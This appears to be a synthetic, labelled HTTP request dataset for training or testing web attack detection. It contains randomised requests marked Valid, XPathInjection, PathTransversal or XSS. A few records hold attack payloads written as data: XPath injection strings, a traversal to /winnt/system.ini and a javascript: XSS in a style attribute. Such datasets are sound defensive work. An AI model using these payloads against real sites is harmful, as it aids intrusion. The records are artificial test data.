Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 157.151.39.184
Cookie: lvelaeun=85169;X4KM3VSk=47448899;cth5ntl=oq4dlgaVs6iLtihh;bcmew=0wsobjectiuostl;gueo2uc=cmda;cHar9Rxbt=Eewiftcr40u3iisba
Cookie2: $Version="23"
Date: Sat, 11 Jun 05 11:33:05 UTC
ETag: W/"inwJFVUXYs1ogSb"
Expect: sxatrhe=mehEf;GeRnd
From: sosNck9@uirsb.org
If-Modified-Since: Wed, 04 May 05 17:42:00 GMT
If-Unmodified-Since: Mon, 07 May 07 03:27:54 UTC
If-Match: "W1xMIT96R75oIQZ"
If-None-Match: *
If-Range: *
Max-Forwards: 147
MIME-Version: 7.2
Pragma: zpie=jyr
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: Basic ZVNlY25hbmw6dWMyYXRlcG8=
Range: 227994-,-2,-88
Referer: /emol/sq1bahl/tulhthay/oere.asmx
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/0.5 (X11; U; Solaris 2.1; cm-sc; rv:2.8.3) Gecko/08607194
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7281x9184
Via: 5.5 www.x9nlmr3.js:91609, 1.3 www.rErzqaae.jpg
Transfer-Encoding: identity
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 154 www.hcosnooA.png "taactmae" "Thu, 01 Oct 09 07:27:56 GMT"
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 156
Start - Id: 25647
class: Valid
GET /txiKxuyUvgz2./n@ft/cyseeeln6eezhroebrt6/oqcXo.oqGUF2M2D0lO.htm?rba4XE=nr6tmu3dN&eat4bcltngernh=en0slib&uIemmta2oi0msht=30960&mceznroknm=39565 HTTP/1.0
Host: www.s8atrrsel.gov
Connection: keep-alive
Accept: audio/x-wav;q=0.6, video/mpeg;q=0.9, application/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6, identity;q=0.5, identity;q=0.4, deflate
Accept-Language: *
Cache-Control: eee='urih3dn'
Client-ip: 57.161.129.174
Cookie: ntrb=htirdznhiuryBdusi;iitjrz=atonzn6lniea7doi;eriiesct8=n4I;4r=64;aoinyAedojCwf=660328
Cookie2: $Version="0"
Date: Tue, 27 Apr 04 11:54:08 CET
ETag: W/"zHvbCNLLI2WuB17G"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 05 Jun 05 12:40:57 GMT
If-Unmodified-Since: Thu, 15 Jan 04 14:32:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 23
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="39Be227EC208BA7CeFdeE2C2Aaa7BC69"
Range: -8653,3111-
Referer: /ico50S/zsrto/h1fw/Sotsbsd.txt
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 3.8; 5c-r2; rv:6.5.2) Gecko/09347578
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: Opt/7.1 226.114.86.184:2078
Transfer-Encoding: identity
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25647
Start - Id: 8522
class: Valid
GET /76nilesehhhaii/oumelu9ndsttts7fkrfx/nU/80RD4V_qdA3R/05eb0A/nq/uteb1Ro09netgr/fIakurrnhjaP.js?aenoa4srooas=I%29k%2Bpihoml+s&es6e0=060854&ofgtoij=H&eeG=pshtpassRsu9itnhhttpsuota&kmCebeta2tCg=12813323&m9M=191523451&hnOgu=85635&bX8M0jxgwindow.openp=iframe%5D%3Fdelete5linkenodefTrdJjdere&EhEOhoahS=ub9e&tdyeijsiToodha=9210 HTTP/1.0
Host: www.iOynt.ch:8857
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.6, identity, compress;q=0.6
Accept-Language: A-jAarnj
Cache-Control: no-transform
Client-ip: 255.161.121.240
Cookie: ent=99;rtsaItat=89
Cookie2: $Version="3"
Date: Tue, 02 Jan 07 24:45:28 CET
ETag: "VYwYeqQX2hURZNlJJfS3"
Expect: slYre
From: s8eite@bed998ce.de
If-Modified-Since: Tue, 11 Jul 06 20:29:54 CET
If-Unmodified-Since: Fri, 02 Apr 10 03:34:43 CET
If-Match: "PG-NZD-L6cCoHUvs5A"
If-None-Match: *
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 9909
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: Basic aGhodDpvZWl1
Range: 288-033,80242-026
Referer: http://www.hedmbn.net/sotc/etomeji/b3eno/iprIgo.swf
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/8.2 (X11; U; Unix 6.8; hs-rv; rv:8.0.1) Gecko/45905043
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 108x957
Via: FTP/1.4 30.111.168.67:320, 1.8 117.190.220.205
Transfer-Encoding: deflate
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 642382029635717
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8522
Start - Id: 48592
class: XPathInjection
PUT /IsLJeLJnBIbNcopy/Jh.w.php3? HTTP/1.1
Content-Length: 237
Content-Language: nea
Content-Encoding: compress
Content-Location: /groqi/paIcoi20/r4co3Na8/o7sss.ace
Content-MD5: emxlb3JlaHNySWkzMXdIVA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Sep 08 18:22:20 GMT
Last-Modified: Mon, 25 Sep 06 14:11:29 UTC
Host: 97.13.248.66:80
Connection: keep-alive
Accept: text/xml, audio/basic, audio/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: earnTe='whdnansl'
Client-ip: 58.151.109.14
Cookie: o4mfTsVzs=3;j.cMARUPWw=1;erhrnnAi=nmoerntl;nM9doeirOc4s=k8z0Ng;zeeqorsrhsg=3714
Cookie2: $Version="357"
Date: Wed, 28 Dec 05 05:10:25 GMT
ETag: "dsBE.ugc3XCkMrAk5"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Fri, 12 Aug 05 14:17:39 UTC
If-Unmodified-Since: Fri, 19 Oct 07 09:57:59 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 1
MIME-Version: 0.0
Pragma: Mc6ni24t=elsqie9
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: /Ntesi/woeea/6rtbnp/sus1thi/eEti8l.png
TE: deflate;q=0.7,gzip
Trailer: Authorization
User-Agent: Mozilla/3.4 (X11; U; Linux i586 7.9; eq-8c; rv:4.2.2) Gecko/86019741
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: qhsm/3.4 www.itq5pe.shtml
Transfer-Encoding: Oocesg; yihiw=2shm8kth
Upgrade: iet/6.7, kor/5.0, pfedee/5.3, sae1/5.6
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

arlts=yLmx9aTH5&iNrebqodmaz5=22811372&rsotfutr2t1ces=8816358993&e2wQvarnoHCs=6fog'   or    path/child::node()[position()=N]  or     'faohss'=  '&Ce28qrrf=neabh&erytuld=dAQFcnCo&onxclibS=nsrxel&ieeoa9nt8=l16h

End - Id: 48592
Start - Id: 2989
class: Valid
GET /select7gsystemr.mdb?H3=g578qm2giB HTTP/1.0
Host: 26.99.227.112
Connection: rse7
Accept: */*;q=0.7
Accept-Charset: iso-8859-1;q=0.7, big5, gb2312;q=0.5, cp-932
Accept-Encoding: 
Accept-Language: osersLda-rtsPts, a-e9;q=0.8, 8t-Nee7e
Cache-Control: nil='u'
Client-ip: 10.142.110.57
Cookie: ufgtxpcosixs=3lcei;Nobi4pl=n9KzbZcEl0Si
Cookie2: $Version="6"
Date: Mon, 26 Jun 06 17:40:54 CET
ETag: "o942pdQXoL4kHmnt"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 05 May 04 08:39:38 UTC
If-Unmodified-Since: Sun, 12 Nov 06 17:50:33 CET
If-Match: "YtbN0rI5QqnyAKnSlzs"
If-None-Match: *
If-Range: Fri, 20 May 05 21:05:07 CET
Max-Forwards: 451
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ls7i.fr/ag7sO/0eoi.nsf
Authorization: NTLM ZXJ0bFRkclRsclhmbGRpZ3NlZHNwZDNjUWV2cnRTZW5hc2kwbzVsZWNydWUyaGQ=
Range: 91188-
Referer: /8eateoC/ekaia/lntjte5/i0qqsyE.jpeg
TE: trailers
Trailer: User-Agent
User-Agent: ocnoietNegpiei
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: FTP/3.2 179.166.200.22, 4svais/5.5 59.250.237.178, FTP/8.1 211.139.181.19
Transfer-Encoding: 0ennca
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2989
Start - Id: 30057
class: Valid
GET /tsn/sonxqwejegeo9jtw4/rniDebeded/l0lfkN8/rhwuPdv/ntQ/0arltl2a/eTduhbHTE0J.htm?ao=efrs6DbeSpEi&rAe=ps0d&tmit4ulmj5ni=gbe&OinHi6oOh=%3Coxmlhioiemi&edttnythgic=976891774&y7DOByposition=iLz5&raotsmsnatsi=morhDeal1eth0oned HTTP/1.1
Host: 48.182.51.114:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-1;q=0.0, x-mac-icelandic;q=0.4
Accept-Encoding: 
Accept-Language: begtliNc-ntc;q=0.4, heb-rernes;q=0.3, oehroca-rmoate8;q=0.0, rHuwaHla-io2
Cache-Control: min-fresh=77262
Client-ip: 21.39.235.102
Cookie: qsiaNc8Unssb=Eleyltne7otilfrompechos5<
Cookie2: $Version="16"
Date: Fri, 23 Dec 05 21:10:35 GMT
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 08 Feb 07 08:37:52 GMT
If-Unmodified-Since: Fri, 20 Apr 07 10:09:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8159
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ntehiid"
Range: 801-,-797
Referer: http://www.lnnooBu.st/bhau/mLbseao.zip
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 1.8; sE-ic; rv:9.1.3) Gecko/35153814
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: 0.1 www.5nmr.jpg, FTP/5.3 www.lEse.jpg, HTTP/4.9 8.59.146.114
Transfer-Encoding: deflate
Upgrade: batwt/6.7
Warning: 581 www.tnjva9ml.shtml:8444 "e1srtmxWdaoorc7sra" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 243330147588053404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30057
Start - Id: 45112
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.imd8dsi.biz
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-10646-ucs-2;q=0.9, windows-1252;q=0.5, euc-cn, euc-tw, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.161.164.98
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="148"
Date: Mon, 10 Nov 08 20:57:37 UTC
ETag: W/"8yGmGypk0PQXmLHhmg"
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: "VKlMpA-0g@tRIzgGXFG"
Max-Forwards: 41
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: /tgcRe1c/oeyinaig/2tSotNT/Rseeh.aspx
TE: trailers
Trailer: Referer
User-Agent: hovu (t_WeRXnReM; 8aCtjdYW4w; hP69_kxlZ; mY1M0iv)
UA-CPU: StrongARM
UA-Disp: 9898,841,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: compress
Upgrade: ifi/1.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45112
Start - Id: 27481
class: Valid
GET /eqZpYIj/cyF9AGJOJvSk8bLmP/8XX-@EecopyFJLselectwindow.open/ri5A38xsAE/rOypwzcwU34H/evt6@-@zZxzG.XI/tqrmaod1ofgysnss/nn6/josxtasd4iaeaT/svSn3BSM39lw7QmRVPdQ/oit3rohGs3F.jpg?46y=ft&Ehkfet=%5Dts1msambI%2Fjs5ss&e1tefRtdaead=hss7ruhttpnl7%7E-d6nInodt&Lo2hhX=nzA&P8ADZx9EGl=7028&lxLw=%7Ei%3Cl&1WM4BjB=a&tsjtfa3asi=vpositionmailTlsock_stream&ottmOhsr=0254511 HTTP/1.1
Host: www.rlaeni.gov
Connection: izppela
Accept: text/plain
Accept-Charset: *
Accept-Encoding: compress, gzip, compress, compress
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 124.253.112.175
Cookie: tfnatouil=4?+ahgtotBTtvbscript
Cookie2: $Version="5"
Date: Sun, 11 Jan 09 20:20:20 GMT
ETag: W/"IEx-AMngUriSteZmxot"
Expect: loselr
From: tirio@Wnps.be
If-Modified-Since: Mon, 23 Jun 08 02:44:58 UTC
If-Unmodified-Since: Thu, 08 Dec 05 12:10:14 CET
If-Match: *
If-None-Match: "G9Bnw-a6D1ePF4miwhW"
If-Range: "o8yokLvA9gxHtQg@3W"
Max-Forwards: 9
MIME-Version: 4.1
Pragma: miqnoIi3='H6eiemm'
Proxy-Authorization: Digest username="enae4"
Authorization: Basic Tm5zZWM0czpyZU9k
Range: -526042
Referer: /ilyehn/Yzeir/tCxpeaut/sniad.cgi
TE: chunked,chunked;q=0.3
Trailer: Referer
User-Agent: ooohzie/0.8.4.1.7
UA-CPU: StrongARM
UA-Disp: 617,9793,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 802x162
Via: ybyr4/0.7 3.188.213.235, 8.7 178.24.47.56, icl/2.2 www.t06se.html:1
Transfer-Encoding: compress
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 874 www.owRuocd.js "2ei4cbcrn2" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27481
Start - Id: 49573
class: XPathInjection
GET /inriTfctzLmnt.gif?xycbl=ltE&7Ngttip=881&PechophpJ=F&l4=89++or++h0c0%2FLeea%2Fi4egt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+++++or++675%3D HTTP/1.1
Host: 236.212.27.55
Connection: rusctu7F
Accept: */*
Accept-Charset: iso-8859-9, koi8-r;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 27.25.46.254
Cookie: htutqianda=248623;bhe=itrhettffhm
Cookie2: $Version="6"
Date: Mon, 14 Jan 08 06:00:46 CET
ETag: "BEeu9oNIpOCkdaWPzyls"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Fri, 27 Oct 06 07:16:09 UTC
If-Match: *
If-None-Match: "YVg9Cdo6uCmRny7"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: NTLM Zjdzb3RzZWxoYWRyeWFrYVRla0RkZG8xZkYxc2VsZWxzaGlnMTJtdGV2bnRldGlp
Range: -351866,-996363,00-
Referer: /ethe.mpeg
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 1.6; ve-LH; rv:0.6.1) Gecko/99766613
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9192x115
Via: 6.4 144.180.153.142, 1.5 www.dy7xi.htm
Transfer-Encoding: identity
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49573
Start - Id: 46891
class: XSS
PUT /mzo/afvD/1DHoYSZCgk/orC9aotaiaxidclefs/TX9k/en3d4LWF6_o4U6T16/iW/dxTp..qXNnE/uui.S./uiwy/zR7gMALg.bin? HTTP/1.0
Content-Length: 219
Content-Language: quthp,oz8atkES
Content-Encoding: gzip
Content-Location: /e4ot/chp73y.conf
Content-MD5: VHRuRWNOc2RzZXN1MW5peA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Mar 09 03:37:36 UTC
Last-Modified: Thu, 31 Dec 09 16:40:37 UTC
Host: 168.44.243.166:80
Connection: Ailt
Accept: */*
Accept-Charset: windows-1251, x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=82259
Client-ip: 164.249.24.153
Cookie: tt=n@t eiueN;stiEonptb=FloP;Lxp_vu.divrZA=ouQ
Cookie2: $Version="07"
Date: Sun, 07 Dec 08 06:25:50 UTC
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 05 Feb 04 19:46:31 GMT
If-Unmodified-Since: Tue, 27 Apr 10 18:52:24 CET
If-Match: *
If-None-Match: *
If-Range: "n2D51t7HJusGuEd7"
Max-Forwards: 484
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /5an2qo/tdAp/rahcTnf.gif
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: eakrb4sl (tsDaVdzgRo; shTY9eiT3q; oleK6@; iKwT_V; eV-Kb7wEc9)
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: tWfos/8.2 250.12.26.107, sar/1.4 111.11.79.32, 8.3 19.189.58.4
Transfer-Encoding: compress
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------------
~~~~~: ~~~~~~~~~~~

9AtOO6tttaetCis=ulelaa&ee=8013830&lsetEa1ehrqsha=7775717&vrtzuuplE=roo&b8dilis=sferlpsystem&r_SvT=<div style    = "   background-image:     url(javascript:  [alert  ('S7tni');]);   "  >

End - Id: 46891
Start - Id: 22214
class: Valid
GET /1YBDxEaNqEp/dVFHH7--o/s0wT/n9Q/eltk5ddiorsfoootel/talm5ws/x2/.l/af/tyFnz1@8/o-4cZzLL.php?nA=a%26&etnoltgtiltOidc=eh4shutdownu%7Edae&anfAIEe4i0ll=d&eiry6ehose5zge8=m%40jOh2C&pn=tnnitldtar0ykha&I4nc24mhhsZ=27&iInpneopapmt=6075159901&bMkshutdownGXT.kg=uB&e5Eenaztsen5a7n=757&eUhchwnlottsas=SsselthomeaDt&dewlmessxt1=gibamfeoeTQ&catXcx0ainsert5o=SOswsnwEzEe1la HTTP/1.1
Host: 124.37.31.85
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 250.180.79.172
Cookie: 9resaeeHrt=kaofamb\5m5einsertfjnueo;aledh4s0=85053001
Cookie2: $Version="1"
Date: Fri, 02 Feb 07 16:30:36 CET
ETag: W/"JVbXKO-H7teQCYptg"
Expect: 100-continue
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Thu, 04 Dec 08 08:52:19 CET
If-Unmodified-Since: Sat, 27 Jun 09 21:31:39 GMT
If-Match: *
If-None-Match: "1tdfU1uTKqLmFRRvKuL"
If-Range: "utJYPPeCgJDUW4ZQYJsb"
Max-Forwards: 0
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: Basic aElycnJ0OmVydHU=
Range: -09
Referer: /eean.conf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.5 (X11; U; SunOS sun4u 8.8; Se-il; rv:5.2.9) Gecko/38026216
UA-CPU: Sparc
UA-Disp: 425,349,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9834x5645
Via: FTP/7.9 www.ewtr.tiff
Transfer-Encoding: Qahe; m22n7ihn=hKnre
Upgrade: 7absTi/0.9, bACcr/4.9
Warning: 471 www.ihhsmu.html:12 "iviIgox" 
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22214
Start - Id: 19850
class: Valid
GET /bodynTLywhereNlike/6lmmiaEto/u1tesaeprlysnfEiat/3-BTuJAtKjm/9itwbgroElhraqnu/eF6ljVUCzXEyybFxQKdJ.php?seAt6us=lnrSQboot.initsnuKe2+&r6saatzrw4N=hd3xm%40f5r&RGq.Ptnj=1&am0zu=odharU6wAE0jmu&itue1haRbhrb=ropt HTTP/1.1
Host: www.21wfanoim.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: h=lefshJos
Client-ip: 18.141.33.165
Cookie: traHoiac=5170
Cookie2: $Version="71"
Date: Wed, 21 Dec 05 20:15:06 GMT
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: 100-continue
From: gexsln@eobev.de
If-Modified-Since: Sat, 07 Aug 04 09:17:23 GMT
If-Unmodified-Since: Sun, 18 Jun 06 23:18:52 UTC
If-Match: "YDNS.yvUf97NT_-"
If-None-Match: "BuJQPFa0Pu90wQDc4d"
If-Range: Sun, 23 Dec 07 03:17:44 UTC
Max-Forwards: 98
MIME-Version: 2.8
Pragma: SH=db
Proxy-Authorization: NTLM Y0dvbnp0c2xhZXdyaDl0empuOXJvUjRtdGVpbk9seXJ6aXI=
Authorization: Basic YW93aGV0RWg6bjhocw==
Range: 0-8,719-
Referer: http://oadegt.it/clW0ly/onehh/suszEaL.js
TE: deflate;q=0.4
Trailer: Accept-Encoding
User-Agent: ce9emc8ptdaird
UA-CPU: StrongARM
UA-Disp: 9849,2633,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/9.6 56.28.121.17, 5.5 12.168.219.120:0
Transfer-Encoding: deflate
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19850
Start - Id: 21030
class: Valid
GET /cc/norqb/fehm/urBmX@9o0FusrdWDH/nlqicjrcia/lnvgwlrrsaB/Ni74N8oHincludetWf/eiansi/n87_J59hU/azBsUZkzwj7H/thrcdu.css?riwfrut5jnfn=544&hrsdipeRd4wo=at&fonmqoeusCcasr0=gmnyf8dohsimlSa&selectjLv3Z32-=aprg2uy+pt&ghsih=q%40GIpon&pslsU2h.2UEu-=sbQchRY&Ee=10&ee0dnerecsrcl=sn&TceeE2hee=%29r&sslIlsaoire1t=saNa&ppcH6Miehgh=172726&wvwrr=al8Rs&GbgsoundTDOa8xbvi=72659 HTTP/1.0
Host: 254.166.55.192
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 4rpl-wlwriIn1;q=0.1, 9-h
Cache-Control: no-cache
Client-ip: 7.237.11.250
Cookie: soarail=c;tnmochan%tY;LdegmeItnueose6=oYaa;nfer0=5473
Cookie2: $Version="298"
Date: Sat, 02 May 09 09:57:21 GMT
ETag: "tSIF4JdVwqhwBsi"
Expect: epese=5Pnfa
From: hrtiet@tsotaco.it
If-Modified-Since: Thu, 18 Nov 04 07:29:33 UTC
If-Unmodified-Since: Sat, 19 Sep 09 07:59:47 GMT
If-Match: "SgftQwnpIuULytDCL7B"
If-None-Match: *
If-Range: *
Max-Forwards: 935
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic bld3MW5lZWg6YWRvNg==
Range: 729-89313,-42549,64779-835298
Referer: http://ueycueem.fr/Waahtbaa/sot76i/iouaDri/eL2l3e/hxke.cfm
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: FthC/5.4.7
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 985x390
Via: 4wtle7/9.4 214.142.10.111
Transfer-Encoding: gzip
Upgrade: stlms2/7.1
Warning: 107 www.9irolwh.htm "6dC3ha2n" 
X-Forwarded-For: 155.13.62.32
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21030
Start - Id: 12700
class: Valid
GET /t16-5VwISJQ0/LMPnErmRQ/eieYhlsonct/3mbsuWKerHIk6dFY.shtml? HTTP/1.1
Host: 18.118.101.64
Connection: close
Accept: application/x-tar, video/*;q=0.6, text/*;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.4, euc-cn;q=0.5, iso-10646-ucs-2, x-mac-turkish;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=94
Client-ip: 141.142.203.127
Cookie: jo1Ee1s=blga3kYz4aO;nyThoh=mraoru;thi=ruShc;AyqxuO=4nrlhnmchk;loiepeeDae=eMrmuozasryi;tytnd=513995066
Cookie2: $Version="994"
Date: Wed, 25 Jan 06 23:10:36 CET
ETag: "nqAAltaC5qFMUOnweP-h"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Sat, 05 Mar 05 23:05:43 GMT
If-Unmodified-Since: Tue, 24 Aug 04 22:32:21 UTC
If-Match: *
If-None-Match: "BZIF.ZivsnqJBPrO"
If-Range: *
Max-Forwards: 870
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: Basic QWQ1NHRzOjByY3Ri
Range: 663086-5
Referer: http://www.8eteiNL.net/umiec/4tICT/2lOou/bes1agE/wenEr.mdb
TE: deflate,gzip
Trailer: Authorization
User-Agent: Mozilla/6.7 (compatible; Konqueror/1.7; WinNT; d7abrtc)
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 072x109
Via: pad/3.3 61.87.216.217, 9.6 www.eEozirue.png:34018, FTP/7.7 www.sidso.png
Transfer-Encoding: deflate
Upgrade: hlvieb/6.1, ea8O/4.9, dmeXre/8.7, htt5c/9.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 16.208.183.253
X-Serial-Number: 91220427481224
----: -------------------------------
